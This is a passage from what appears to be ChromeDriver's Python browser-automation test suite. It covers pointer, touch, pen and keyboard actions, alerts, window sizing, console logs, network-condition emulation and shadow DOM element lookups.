{"type": "pointerUp"}],
"parameters": {"pointerType": "touch"},
"id": "pointer1"}]})
self._driver.PerformActions(actions)
self.assertEquals(1, len(self._driver.FindElements('tag name', 'br')))
def testActionsMultiTouchPoint(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
self._driver.ExecuteScript(
'''
document.body.innerHTML
= "<div id='div' autofocus style='width:200px; height:200px'>";
window.events = [];
const div = document.getElementById('div');
div.addEventListener('touchstart', event => {
window.events.push(
{type: event.type,
x: event.touches[event.touches.length - 1].clientX,
y: event.touches[event.touches.length - 1].clientY});
});
div.addEventListener('touchend', event => {
window.events.push(
{type: event.type});
});
''')
time.sleep(1)
actions = ({"actions": [{
"type":"pointer",
"actions":[{"type": "pointerMove", "x": 50, "y": 50},
{"type": "pointerDown"},
{"type": "pointerUp"}],
"parameters": {"pointerType": "touch"},
"id": "pointer1"},
{
"type":"pointer",
"actions":[{"type": "pointerMove", "x": 60, "y": 60},
{"type": "pointerDown"},
{"type": "pointerUp"}],
"parameters": {"pointerType": "touch"},
"id": "pointer2"}]})
self._driver.PerformActions(actions)
time.sleep(1)
events = self._driver.ExecuteScript('return window.events')
self.assertEquals(4, len(events))
self.assertEquals("touchstart", events[0]['type'])
self.assertEquals("touchstart", events[1]['type'])
self.assertEquals("touchend", events[2]['type'])
self.assertEquals("touchend", events[3]['type'])
self.assertAlmostEqual(50, events[0]['x'], delta=1)
self.assertAlmostEqual(50, events[0]['y'], delta=1)
self.assertAlmostEqual(60, events[1]['x'], delta=1)
self.assertAlmostEqual(60, events[1]['y'], delta=1)
self._driver.ReleaseActions()
def testActionsMulti(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
self._driver.ExecuteScript(
'''
document.body.innerHTML
= "<div id='div' autofocus style='width:200px; height:200px'>";
window.events = [];
const div = document.getElementById('div');
div.addEventListener('click', event => {
window.events.push(
{x: event.clientX, y: event.clientY});
});
''')
# Move mouse to (50, 50).
self._driver.PerformActions({'actions': [
{
'type': 'pointer',
'id': 'mouse',
'actions': [ {'type': 'pointerMove', 'x': 50, 'y': 50} ]
}
]})
# Click mouse button. ChromeDriver should remember that mouse is at
# (50, 50).
self._driver.PerformActions({'actions': [
{
'type': 'pointer',
'id': 'mouse',
'actions': [
{'type': 'pointerDown', "button": 0},
{'type': 'pointerUp', "button": 0}
]
}
]})
events = self._driver.ExecuteScript('return window.events')
self.assertEquals(1, len(events))
self.assertAlmostEqual(50, events[0]['x'], delta=1)
self.assertAlmostEqual(50, events[0]['y'], delta=1)
# Clean up action states, move mouse back to (0, 0).
self._driver.ReleaseActions()
# Move mouse relative by (80, 80) pixels, and then click.
self._driver.PerformActions({'actions': [
{
'type': 'pointer',
'id': 'mouse',
'actions': [
{'type': 'pointerMove', 'x': 80, 'y': 80, 'origin': 'pointer'},
{'type': 'pointerDown', "button": 0},
{'type': 'pointerUp', "button": 0}
]
}
]})
events = self._driver.ExecuteScript('return window.events')
self.assertEquals(2, len(events))
self.assertAlmostEqual(80, events[1]['x'], delta=1)
self.assertAlmostEqual(80, events[1]['y'], delta=1)
self._driver.ReleaseActions()
def testActionsPenPointerEventProperties(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
self._driver.ExecuteScript(
'''
document.body.innerHTML = "<div>test</div>";
var div = document.getElementsByTagName("div")[0];
div.style["width"] = "100px";
div.style["height"] = "100px";
window.events = [];
div.addEventListener("pointerdown", event => {
window.events.push(
{type: event.type,
x: event.clientX,
y: event.clientY,
width: event.width,
height: event.height,
pressure: event.pressure,
tiltX: event.tiltX,
tiltY: event.tiltY,
twist: event.twist});
});
''')
time.sleep(1)
actions = ({"actions": [{
"type":"pointer",
"actions":[{"type": "pointerMove", "x": 30, "y": 30},
{"type": "pointerDown", "button": 0, "pressure":0.55,
"tiltX":-36, "tiltY":83, "twist":266},
{"type": "pointerMove", "x": 50, "y": 50},
{"type": "pointerUp", "button": 0}],
"parameters": {"pointerType": "mouse"},
"id": "pointer1"}]})
self._driver.PerformActions(actions)
time.sleep(1)
events = self._driver.ExecuteScript('return window.events')
self.assertEquals(1, len(events))
self.assertEquals("pointerdown", events[0]['type'])
self.assertAlmostEqual(30, events[0]['x'], delta=1)
self.assertAlmostEqual(30, events[0]['y'], delta=1)
self.assertEquals(1.0, round(events[0]['width'], 2))
self.assertEquals(1.0, round(events[0]['height'], 2))
self.assertEquals(0.55, round(events[0]['pressure'], 2))
self.assertEquals(-36, events[0]['tiltX'])
self.assertEquals(83, events[0]['tiltY'])
self.assertEquals(266, events[0]['twist'])
def testActionsPenPointerEventPressure(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
self._driver.ExecuteScript(
'''
document.body.innerHTML = "<div>test</div>";
var div = document.getElementsByTagName("div")[0];
div.style["width"] = "100px";
div.style["height"] = "100px";
window.events = [];
var event_list = ["pointerdown", "pointermove", "pointerup"];
for (var i = 0; i < event_list.length; i++) {
div.addEventListener(event_list[i], event => {
window.events.push(
{type: event.type,
x: event.clientX,
y: event.clientY,
pressure: event.pressure,
twist: event.twist});
});
}
''')
time.sleep(1)
actions = ({"actions": [{
"type":"pointer",
"actions":[{"type": "pointerMove", "x": 30, "y": 30},
{"type": "pointerDown", "button": 0,
"twist":30},
{"type": "pointerMove", "x": 50, "y": 50},
{"type": "pointerUp", "button": 0}],
"parameters": {"pointerType": "pen"},
"id": "pointer1"}]})
self._driver.PerformActions(actions)
time.sleep(1)
events = self._driver.ExecuteScript('return window.events')
self.assertEquals(4, len(events))
self.assertEquals("pointermove", events[0]['type'])
self.assertAlmostEqual(30, events[0]['x'], delta=1)
self.assertAlmostEqual(30, events[0]['y'], delta=1)
self.assertEquals(0.0, round(events[0]['pressure'], 2))
self.assertEquals(0, events[0]['twist'])
self.assertEquals("pointerdown", events[1]['type'])
self.assertAlmostEqual(30, events[1]['x'], delta=1)
self.assertAlmostEqual(30, events[1]['y'], delta=1)
self.assertEquals(0.5, round(events[1]['pressure'], 2))
self.assertEquals(30, events[1]['twist'])
self.assertEquals("pointermove", events[2]['type'])
self.assertAlmostEqual(50, events[2]['x'], delta=1)
self.assertAlmostEqual(50, events[2]['y'], delta=1)
self.assertEquals(0.5, round(events[2]['pressure'], 2))
self.assertEquals(0, events[2]['twist'])
self.assertEquals("pointerup", events[3]['type'])
self.assertAlmostEqual(50, events[3]['x'], delta=1)
self.assertAlmostEqual(50, events[3]['y'], delta=1)
self.assertEquals(0.0, round(events[3]['pressure'], 2))
self.assertEquals(0, events[3]['twist'])
def testActionsPause(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
self._driver.ExecuteScript(
'''
document.body.innerHTML
= "<input type='text' autofocus style='width:100px; height:100px'>";
window.events = [];
const input = document.getElementsByTagName("input")[0];
const listener
= e => window.events.push({type: e.type, time: e.timeStamp});
input.addEventListener("keydown", listener);
input.addEventListener("keyup", listener);
input.addEventListener("mousedown", listener);
''')
# Actions on 3 devices, across 6 ticks, with 200 ms pause at ticks 1 to 4.
# Tick "key" device "pointer" device "none" device
# 0 move
# 1 pause 200 ms pointer down pause 100 ms
# 2 "a" key down pointer up pause 200 ms
# 3 "a" key up pause 200 ms
# 4 "b" key down move 200 ms
# 5 "b" key up
actions = {'actions': [
{
'type': 'key',
'id': 'key',
'actions': [
{'type': 'pause'},
{'type': 'pause', 'duration': 200},
{'type': 'keyDown', 'value': 'a'},
{'type': 'keyUp', 'value': 'a'},
{'type': 'keyDown', 'value': 'b'},
{'type': 'keyUp', 'value': 'b'},
]
},
{
'type': 'pointer',
'id': 'mouse',
'actions': [
{'type': 'pointerMove', 'x': 50, 'y': 50},
{'type': 'pointerDown', 'button': 0},
{'type': 'pointerUp', 'button': 0},
{'type': 'pause', 'duration': 200},
{'type': 'pointerMove', 'duration': 200, 'x': 10, 'y': 10},
]
},
{
'type': 'none',
'id': 'none',
'actions': [
{'type': 'pause'},
{'type': 'pause', 'duration': 100},
{'type': 'pause', 'duration': 200},
]
}
]}
self._driver.PerformActions(actions)
events = self._driver.ExecuteScript('return window.events')
expected_events = ['mousedown', 'keydown', 'keyup', 'keydown', 'keyup']
self.assertEquals(len(expected_events), len(events))
for i in range(len(events)):
self.assertEqual(expected_events[i], events[i]['type'])
if i > 0:
elapsed_time = events[i]['time'] - events[i-1]['time']
self.assertGreaterEqual(elapsed_time, 200)
def testReleaseActions(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
self._driver.ExecuteScript(
'''
document.body.innerHTML
= "<input id='target' type='text' style='width:200px; height:200px'>";
window.events = [];
const recordKeyEvent = event => {
window.events.push(
{type: event.type, code: event.code});
};
const recordMouseEvent = event => {
window.events.push(
{type: event.type, x: event.clientX, y: event.clientY});
};
const target = document.getElementById('target');
target.addEventListener('keydown', recordKeyEvent);
target.addEventListener('keyup', recordKeyEvent);
target.addEventListener('mousedown', recordMouseEvent);
target.addEventListener('mouseup', recordMouseEvent);
''')
# Move mouse to (50, 50), press a mouse button, and press a key.
self._driver.PerformActions({'actions': [
{
'type': 'pointer',
'id': 'mouse',
'actions': [
{'type': 'pointerMove', 'x': 50, 'y': 50},
{'type': 'pointerDown', "button": 0}
]
},
{
'type': 'key',
'id': 'key',
'actions': [
{'type': 'pause'},
{'type': 'pause'},
{'type': 'keyDown', 'value': 'a'}
]
}
]})
events = self._driver.ExecuteScript('return window.events')
self.assertEquals(2, len(events))
self.assertEquals('mousedown', events[0]['type'])
self.assertAlmostEqual(50, events[0]['x'], delta=1)
self.assertAlmostEqual(50, events[0]['y'], delta=1)
self.assertEquals('keydown', events[1]['type'])
self.assertEquals('KeyA', events[1]['code'])
self._driver.ReleaseActions()
events = self._driver.ExecuteScript('return window.events')
self.assertEquals(4, len(events))
self.assertEquals('keyup', events[2]['type'])
self.assertEquals('KeyA', events[2]['code'])
self.assertEquals('mouseup', events[3]['type'])
self.assertAlmostEqual(50, events[3]['x'], delta=1)
self.assertAlmostEqual(50, events[3]['y'], delta=1)
def testActionsCtrlCommandKeys(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
self._driver.ExecuteScript('''
document.write('<input type="text" id="text1" value="Hello World" />');
document.write('<br/>')
document.write('<input type="text" id="text2">');
var text1 = document.getElementById("text1");
text1.addEventListener("click", function() {
var text1 = document.getElementById("text1");
text1.value="new text";
});
''')
time.sleep(1)
elem1 = self._driver.FindElement('css selector', '#text1')
elem2 = self._driver.FindElement('css selector', '#text2')
self.assertEquals("Hello World", elem1.GetProperty('value'))
time.sleep(1)
platform = util.GetPlatformName()
modifier_key = u'\uE009'
if platform == 'mac':
modifier_key = u'\uE03D'
# This is a sequence of actions, first move the mouse to input field
# "elem1", then press ctrl/cmd key and 'a' key to select all the text in
# "elem1", and then press 'x' to cut the text and move the mouse to input
# field "elem2" and press 'v' to paste the text, and at the end, we check
# the texts in both input fields to see if the text are cut and pasted
# correctly from "elem1" to "elem2".
actions = ({'actions': [{
'type': 'key',
'id': 'key',
'actions': [
{'type': 'pause'},
{'type': 'pause'},
{'type': 'pause'},
{'type': 'keyDown', 'value': modifier_key},
{'type': 'keyDown', 'value': 'a'},
{'type': 'keyUp', 'value': 'a'},
{'type': 'keyDown', 'value': 'x'},
{'type': 'keyUp', 'value': 'x'},
{'type': 'keyUp', 'value': modifier_key},
{'type': 'pause'},
{'type': 'pause'},
{'type': 'pause'},
{'type': 'keyDown', 'value': modifier_key},
{'type': 'keyDown', 'value': 'v'},
{'type': 'keyUp', 'value': 'v'},
{'type': 'keyUp', 'value': modifier_key}
]}, {
'type':'pointer',
'actions':[{'type': 'pointerMove', 'x': 0, 'y': 0, 'origin': elem1},
{'type': 'pointerDown', 'button': 0},
{'type': 'pointerUp', 'button': 0},
{'type': 'pause'},
{'type': 'pause'},
{'type': 'pause'},
{'type': 'pause'},
{'type': 'pause'},
{'type': 'pause'},
{'type': 'pointerMove', 'x': 0, 'y': 0, 'origin': elem2},
{'type': 'pointerDown', 'button': 0},
{'type': 'pointerUp', 'button': 0},
{'type': 'pause'},
{'type': 'pause'},
{'type': 'pause'},
{'type': 'pause'}],
'parameters': {'pointerType': 'mouse'},
'id': 'pointer1'}
]})
self._driver.PerformActions(actions)
time.sleep(1)
self.assertEquals("", elem1.GetProperty('value'))
self.assertEquals("new text", elem2.GetProperty('value'))
time.sleep(1)
def testPageLoadStrategyIsNormalByDefault(self):
self.assertEquals('normal',
self._driver.capabilities['pageLoadStrategy'])
def testClearElement(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
text = self._driver.ExecuteScript(
'document.body.innerHTML = \'<input type="text" value="abc">\';'
'return document.getElementsByTagName("input")[0];')
value = self._driver.ExecuteScript('return arguments[0].value;', text)
self.assertEquals('abc', value)
text.Clear()
value = self._driver.ExecuteScript('return arguments[0].value;', text)
self.assertEquals('', value)
def testSendKeysToInputFileElement(self):
file_name = os.path.join(_TEST_DATA_DIR, 'anchor_download_test.png')
self._driver.Load(ChromeDriverTest.GetHttpUrlForFile(
'/chromedriver/file_input.html'))
elem = self._driver.FindElement('css selector', '#id_file')
elem.SendKeys(file_name)
text = self._driver.ExecuteScript(
'var input = document.getElementById("id_file").value;'
'return input;')
self.assertEquals('C:\\fakepath\\anchor_download_test.png', text);
if not _ANDROID_PACKAGE_KEY:
self.assertRaises(chromedriver.InvalidArgument,
elem.SendKeys, "/blah/blah/blah")
def testSendKeysToNonTypeableInputElement(self):
self._driver.Load("about:blank")
self._driver.ExecuteScript(
"document.body.innerHTML = '<input type=\"color\">';")
elem = self._driver.FindElement('tag name', 'input');
input_value = '#7fffd4'
elem.SendKeys(input_value)
value = elem.GetProperty('value')
self.assertEquals(input_value, value)
def testSendKeysNonBmp(self):
self._driver.Load(ChromeDriverTest.GetHttpUrlForFile(
'/chromedriver/two_inputs.html'))
elem = self._driver.FindElement('css selector', '#first')
expected = u'T\U0001f4a9XL\u0436'.encode('utf-8')
elem.SendKeys(expected)
actual = elem.GetProperty('value').encode('utf-8')
self.assertEquals(expected, actual)
def testGetElementAttribute(self):
self._driver.Load(self.GetHttpUrlForFile(
'/chromedriver/attribute_colon_test.html'))
elem = self._driver.FindElement("css selector", "*[name='phones']")
self.assertEquals('3', elem.GetAttribute('size'))
def testGetElementProperty(self):
self._driver.Load(self.GetHttpUrlForFile(
'/chromedriver/two_inputs.html'))
elem = self._driver.FindElement("css selector", "#first")
self.assertEquals('text', elem.GetProperty('type'))
self.assertEquals('first', elem.GetProperty('id'))
def testGetElementSpecialCharAttribute(self):
self._driver.Load(self.GetHttpUrlForFile(
'/chromedriver/attribute_colon_test.html'))
elem = self._driver.FindElement("css selector", "*[name='phones']")
self.assertEquals('colonvalue', elem.GetAttribute('ext:qtip'))
def testGetCurrentUrl(self):
url = self.GetHttpUrlForFile('/chromedriver/frame_test.html')
self._driver.Load(url)
self.assertEquals(url, self._driver.GetCurrentUrl())
self._driver.SwitchToFrame(self._driver.FindElement('tag name', 'iframe'))
self.assertEquals(url, self._driver.GetCurrentUrl())
def testGoBackAndGoForward(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
self._driver.GoBack()
self._driver.GoForward()
def testDontGoBackOrGoForward(self):
# We need to run this test in a new tab so that it is isolated from previous
# test runs.
old_windows = self._driver.GetWindowHandles()
self._driver.ExecuteScript('window.open("about:blank")')
new_window = self.WaitForNewWindow(self._driver, old_windows)
self._driver.SwitchToWindow(new_window)
self.assertEquals('about:blank', self._driver.GetCurrentUrl())
self._driver.GoBack()
self.assertEquals('about:blank', self._driver.GetCurrentUrl())
self._driver.GoForward()
self.assertEquals('about:blank', self._driver.GetCurrentUrl())
def testBackNavigationAfterClickElement(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/link_nav.html'))
link = self._driver.FindElement('css selector', '#l1')
link.Click()
self._driver.GoBack()
self.assertNotEqual('data:,', self._driver.GetCurrentUrl())
self.assertEquals(self.GetHttpUrlForFile('/chromedriver/link_nav.html'),
self._driver.GetCurrentUrl())
def testAlertHandlingOnPageUnload(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
self._driver.ExecuteScript('window.onbeforeunload=function(){return true}')
self._driver.FindElement('tag name', 'body').Click()
self._driver.GoBack()
self.assertTrue(self._driver.IsAlertOpen())
self._driver.HandleAlert(True)
self.assertFalse(self._driver.IsAlertOpen())
def testRefresh(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
self._driver.Refresh()
def testAlert(self):
self.assertFalse(self._driver.IsAlertOpen())
self._driver.ExecuteScript('window.confirmed = confirm(\'HI\');')
self.assertTrue(self._driver.IsAlertOpen())
self.assertEquals('HI', self._driver.GetAlertMessage())
self._driver.HandleAlert(False)
self.assertFalse(self._driver.IsAlertOpen())
self.assertEquals(False,
self._driver.ExecuteScript('return window.confirmed'))
def testSendTextToAlert(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
self._driver.ExecuteScript('prompt = window.prompt()')
self.assertTrue(self._driver.IsAlertOpen())
self._driver.HandleAlert(True, 'TextToPrompt')
self.assertEquals('TextToPrompt',
self._driver.ExecuteScript('return prompt'))
self._driver.ExecuteScript('window.confirmed = confirm(\'HI\');')
self.assertRaises(chromedriver.ElementNotInteractable,
self._driver.HandleAlert,
True, 'textToConfirm')
self._driver.HandleAlert(True) #for closing the previous alert.
self._driver.ExecuteScript('window.onbeforeunload=function(){return true}')
self._driver.FindElement('tag name', 'body').Click()
self._driver.Refresh()
self.assertTrue(self._driver.IsAlertOpen())
self.assertRaises(chromedriver.UnsupportedOperation,
self._driver.HandleAlert,
True, 'textToOnBeforeUnload')
def testAlertOnNewWindow(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
old_windows = self._driver.GetWindowHandles()
self._driver.ExecuteScript("window.open('%s')" %
self.GetHttpUrlForFile('/chromedriver/alert_onload.html'))
new_window = self.WaitForNewWindow(self._driver, old_windows)
self.assertNotEqual(None, new_window)
self._driver.SwitchToWindow(new_window)
self.assertTrue(self._driver.IsAlertOpen())
self._driver.HandleAlert(False)
self.assertFalse(self._driver.IsAlertOpen())
def testShouldHandleNewWindowLoadingProperly(self):
"""Tests that ChromeDriver determines loading correctly for new windows."""
self._http_server.SetDataForPath(
'/newwindow',
"""
<html>
<body>
<a href='%s' target='_blank'>new window/tab</a>
</body>
</html>""" % self._sync_server.GetUrl())
self._driver.Load(self._http_server.GetUrl() + '/newwindow')
old_windows = self._driver.GetWindowHandles()
self._driver.FindElement('tag name', 'a').Click()
new_window = self.WaitForNewWindow(self._driver, old_windows)
self.assertNotEqual(None, new_window)
self.assertFalse(self._driver.IsLoading())
self._driver.SwitchToWindow(new_window)
self.assertTrue(self._driver.IsLoading())
self._sync_server.RespondWithContent('<html>new window</html>')
self._driver.ExecuteScript('return 1') # Shouldn't hang.
def testPopups(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
old_handles = self._driver.GetWindowHandles()
self._driver.ExecuteScript('window.open("about:blank")')
new_window_handle = self.WaitForNewWindow(self._driver, old_handles)
self.assertNotEqual(None, new_window_handle)
def testNoSuchFrame(self):
self.assertRaises(chromedriver.NoSuchFrame,
self._driver.SwitchToFrame, 'nosuchframe')
self.assertRaises(chromedriver.NoSuchFrame,
self._driver.SwitchToFrame,
self._driver.FindElement('tag name', 'body'))
def testWindowPosition(self):
rect = self._driver.GetWindowRect()
self._driver.SetWindowRect(None, None, rect[2], rect[3])
self.assertEquals(rect, self._driver.GetWindowRect())
# Resize so the window isn't moved offscreen.
# See https://bugs.chromium.org/p/chromedriver/issues/detail?id=297.
self._driver.SetWindowRect(640, 400, None, None)
self._driver.SetWindowRect(None, None, 100, 200)
self.assertEquals([640, 400, 100, 200], self._driver.GetWindowRect())
def testWindowSize(self):
rect = self._driver.GetWindowRect()
self._driver.SetWindowRect(rect[0], rect[1], None, None)
self.assertEquals(rect, self._driver.GetWindowRect())
self._driver.SetWindowRect(640, 400, None, None)
self.assertEquals([640, 400, rect[2], rect[3]],
self._driver.GetWindowRect())
def testWindowRect(self):
old_window_rect = self._driver.GetWindowRect()
self._driver.SetWindowRect(*old_window_rect)
self.assertEquals(self._driver.GetWindowRect(), old_window_rect)
target_window_rect = [640, 400, 100, 200]
target_window_rect_dict = {'width': 640, 'height': 400, 'x': 100, 'y': 200}
returned_window_rect = self._driver.SetWindowRect(*target_window_rect)
self.assertEquals(self._driver.GetWindowRect(), target_window_rect)
self.assertEquals(returned_window_rect, target_window_rect_dict)
def testWindowMaximize(self):
old_rect_list = [640, 400, 100, 200]
self._driver.SetWindowRect(*old_rect_list)
new_rect = self._driver.MaximizeWindow()
new_rect_list = [
new_rect['width'],
new_rect['height'],
new_rect['x'],
new_rect['y']
]
self.assertNotEqual(old_rect_list, new_rect_list)
self._driver.SetWindowRect(*old_rect_list)
self.assertEquals(old_rect_list, self._driver.GetWindowRect())
def testWindowMinimize(self):
handle_prefix = "CDwindow-"
handle = self._driver.GetCurrentWindowHandle()
target = handle[len(handle_prefix):]
self._driver.SetWindowRect(640, 400, 100, 200)
rect = self._driver.MinimizeWindow()
expected_rect = {u'y': 200, u'width': 640, u'height': 400, u'x': 100}
#check it returned the correct rect
for key in expected_rect.keys():
self.assertEquals(expected_rect[key], rect[key])
# check its minimized
res = self._driver.SendCommandAndGetResult('Browser.getWindowForTarget',
{'targetId': target})
self.assertEquals('minimized', res['bounds']['windowState'])
def testWindowFullScreen(self):
old_rect_list = [640, 400, 100, 200]
self._driver.SetWindowRect(*old_rect_list)
self.assertEquals(self._driver.GetWindowRect(), old_rect_list)
new_rect = self._driver.FullScreenWindow()
new_rect_list = [
new_rect['width'],
new_rect['height'],
new_rect['x'],
new_rect['y']
]
self.assertNotEqual(old_rect_list, new_rect_list)
self._driver.SetWindowRect(*old_rect_list)
for i in range(10):
if old_rect_list == self._driver.GetWindowRect():
break
time.sleep(0.1)
self.assertEquals(old_rect_list, self._driver.GetWindowRect())
def testConsoleLogSources(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/console_log.html'))
logs = self._driver.GetLog('browser')
self.assertEqual('javascript', logs[0]['source'])
self.assertTrue('TypeError' in logs[0]['message'])
self.assertEqual('network', logs[1]['source'])
self.assertTrue('nonexistent.png' in logs[1]['message'])
self.assertTrue('404' in logs[1]['message'])
# Sometimes, we also get an error for a missing favicon.
if len(logs) > 2:
self.assertEqual('network', logs[2]['source'])
self.assertTrue('favicon.ico' in logs[2]['message'])
self.assertTrue('404' in logs[2]['message'])
self.assertEqual(3, len(logs))
else:
self.assertEqual(2, len(logs))
def testPendingConsoleLog(self):
new_logs = [""]
def GetPendingLogs(driver):
response = driver.GetLog('browser')
new_logs[0] = [x for x in response if x['source'] == 'console-api']
return new_logs[0]
self._driver.Load(self.GetHttpUrlForFile(
'/chromedriver/pending_console_log.html'))
logs = self._driver.GetLog('browser')
self.assertEqual('console-api', logs[0]['source'])
self.assertTrue('"InitialError" 2018 "Third"' in logs[0]['message'])
self.WaitForCondition(lambda: len(GetPendingLogs(self._driver)) > 0 , 6)
self.assertEqual('console-api', new_logs[0][0]['source'])
self.assertTrue('"RepeatedError" "Second" "Third"' in
new_logs[0][0]['message'])
def testGetLogOnClosedWindow(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/page_test.html'))
old_handles = self._driver.GetWindowHandles()
self._driver.FindElement('css selector', '#link').Click()
self.WaitForNewWindow(self._driver, old_handles)
self._driver.CloseWindow()
try:
self._driver.GetLog('browser')
except chromedriver.ChromeDriverException as e:
self.fail('exception while calling GetLog on a closed tab: ' + e.message)
def testGetLogOnWindowWithAlert(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
self._driver.ExecuteScript('alert("alert!");')
try:
self._driver.GetLog('browser')
except Exception as e:
self.fail(e.message)
def testDoesntHangOnDebugger(self):
self._driver.Load('about:blank')
self._driver.ExecuteScript('debugger;')
def testChromeDriverSendLargeData(self):
script = 'return "0".repeat(10e6);'
lots_of_data = self._driver.ExecuteScript(script)
self.assertEquals('0'.zfill(int(10e6)), lots_of_data)
def testEmulateNetworkConditions(self):
# Network conditions must be set before it can be retrieved.
self.assertRaises(chromedriver.UnknownError,
self._driver.GetNetworkConditions)
# DSL: 2Mbps throughput, 5ms RTT
latency = 5
throughput = 2048 * 1024
self._driver.SetNetworkConditions(latency, throughput, throughput)
network = self._driver.GetNetworkConditions()
self.assertEquals(latency, network['latency']);
self.assertEquals(throughput, network['download_throughput']);
self.assertEquals(throughput, network['upload_throughput']);
self.assertEquals(False, network['offline']);
# Network Conditions again cannot be retrieved after they've been deleted.
self._driver.DeleteNetworkConditions()
self.assertRaises(chromedriver.UnknownError,
self._driver.GetNetworkConditions)
def testEmulateNetworkConditionsName(self):
# DSL: 2Mbps throughput, 5ms RTT
# latency = 5
# throughput = 2048 * 1024
self._driver.SetNetworkConditionsName('DSL')
network = self._driver.GetNetworkConditions()
self.assertEquals(5, network['latency']);
self.assertEquals(2048*1024, network['download_throughput']);
self.assertEquals(2048*1024, network['upload_throughput']);
self.assertEquals(False, network['offline']);
def testEmulateNetworkConditionsSpeed(self):
# Warm up the browser.
self._http_server.SetDataForPath(
'/', "<html><body>blank</body></html>")
self._driver.Load(self._http_server.GetUrl() + '/')
# DSL: 2Mbps throughput, 5ms RTT
latency = 5
throughput_kbps = 2048
throughput = throughput_kbps * 1024
self._driver.SetNetworkConditions(latency, throughput, throughput)
_32_bytes = " 0 1 2 3 4 5 6 7 8 9 A B C D E F"
_1_megabyte = _32_bytes * 32768
self._http_server.SetDataForPath(
'/1MB',
"<html><body>%s</body></html>" % _1_megabyte)
start = monotonic()
self._driver.Load(self._http_server.GetUrl() + '/1MB')
finish = monotonic()
duration = finish - start
actual_throughput_kbps = 1024 / duration
self.assertLessEqual(actual_throughput_kbps, throughput_kbps * 1.5)
self.assertGreaterEqual(actual_throughput_kbps, throughput_kbps / 1.5)
def testEmulateNetworkConditionsNameSpeed(self):
# Warm up the browser.
self._http_server.SetDataForPath(
'/', "<html><body>blank</body></html>")
self._driver.Load(self._http_server.GetUrl() + '/')
# DSL: 2Mbps throughput, 5ms RTT
throughput_kbps = 2048
throughput = throughput_kbps * 1024
self._driver.SetNetworkConditionsName('DSL')
_32_bytes = " 0 1 2 3 4 5 6 7 8 9 A B C D E F"
_1_megabyte = _32_bytes * 32768
self._http_server.SetDataForPath(
'/1MB',
"<html><body>%s</body></html>" % _1_megabyte)
start = monotonic()
self._driver.Load(self._http_server.GetUrl() + '/1MB')
finish = monotonic()
duration = finish - start
actual_throughput_kbps = 1024 / duration
self.assertLessEqual(actual_throughput_kbps, throughput_kbps * 1.5)
self.assertGreaterEqual(actual_throughput_kbps, throughput_kbps / 1.5)
def testEmulateNetworkConditionsOffline(self):
# A workaround for crbug.com/177511; when setting offline, the throughputs
# must be 0.
self._driver.SetNetworkConditions(0, 0, 0, offline=True)
self.assertRaises(chromedriver.ChromeDriverException,
self._driver.Load,
self.GetHttpUrlForFile('/chromedriver/page_test.html'))
# The "X is not available" title is set after the page load event fires, so
# we have to explicitly wait for this to change. We can't rely on the
# navigation tracker to block the call to Load() above.
self.WaitForCondition(lambda: 'is not available' in self._driver.GetTitle())
def testSendCommandAndGetResult(self):
"""Sends a custom command to the DevTools debugger and gets the result"""
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/page_test.html'))
params = {}
document = self._driver.SendCommandAndGetResult('DOM.getDocument', params)
self.assertTrue('root' in document)
def _FindElementInShadowDom(self, css_selectors):
"""Find an element inside shadow DOM using CSS selectors.
The last item in css_selectors identify the element to find. All preceding
selectors identify the hierarchy of shadow hosts to traverse in order to
reach the target shadow DOM."""
current = None
for selector in css_selectors:
if current is None:
# First CSS selector, start from root DOM.
current = self._driver
else:
# current is a shadow host selected previously.
# Enter the corresponding shadow root.
current = self._driver.ExecuteScript(
'return arguments[0].shadowRoot', current)
current = current.FindElement('css selector', selector)
return current
def testShadowDomFindElement(self):
"""Checks that chromedriver can find elements in a shadow DOM."""
self._driver.Load(self.GetHttpUrlForFile(
'/chromedriver/shadow_dom_test.html'))
self.assertTrue(self._FindElementInShadowDom(
["#innerDiv", "#parentDiv", "#textBox"]))
def testShadowDomFindChildElement(self):
"""Checks that chromedriver can find child elements from a shadow DOM
element."""
self._driver.Load(self.GetHttpUrlForFile(
'/chromedriver/shadow_dom_test.html'))
elem = self._FindElementInShadowDom(
["#innerDiv", "#parentDiv", "#childDiv"])
self.assertTrue(elem.FindElement("css selector", "#textBox"))
def testShadowDomFindElementFailsFromRoot(self):
"""Checks that chromedriver can't find elements in a shadow DOM from
root."""
self._driver.Load(self.GetHttpUrlForFile(
'/chromedriver/shadow_dom_test.html'))
# can't find element from the root without /deep/
with self.assertRaises(chromedriver.NoSuchElement):
self._driver.FindElement("css selector", "#textBox")
def testShadowDomText(self):
"""Checks that chromedriver can find extract the text from a shadow DOM
element."""
self._driver.Load(self.GetHttpUrlForFile(
'/chromedriver/shadow_dom_test.html'))
elem = self._FindElementInShadowDom(
["#innerDiv", "#parentDiv", "#heading"])
self.assertEqual("Child", elem.GetText())
def testShadowDomSendKeys(self):
"""Checks that chromedriver can call SendKeys on a shadow DOM element."""
self._driver.Load(self.GetHttpUrlForFile(
'/chromedriver/shadow_dom_test.html'))
elem = self._FindElementInShadowDom(
["#innerDiv", "#parentDiv", "#textBox"])
elem.SendKeys("bar")
self.assertEqual("foobar", self._driver.ExecuteScript(
'return arguments[0].value;', elem))
def testShadowDomClear(self):
"""Checks that chromedriver can call Clear on a shadow DOM element."""
self._driver.Load(self.GetHttpUrlForFile(
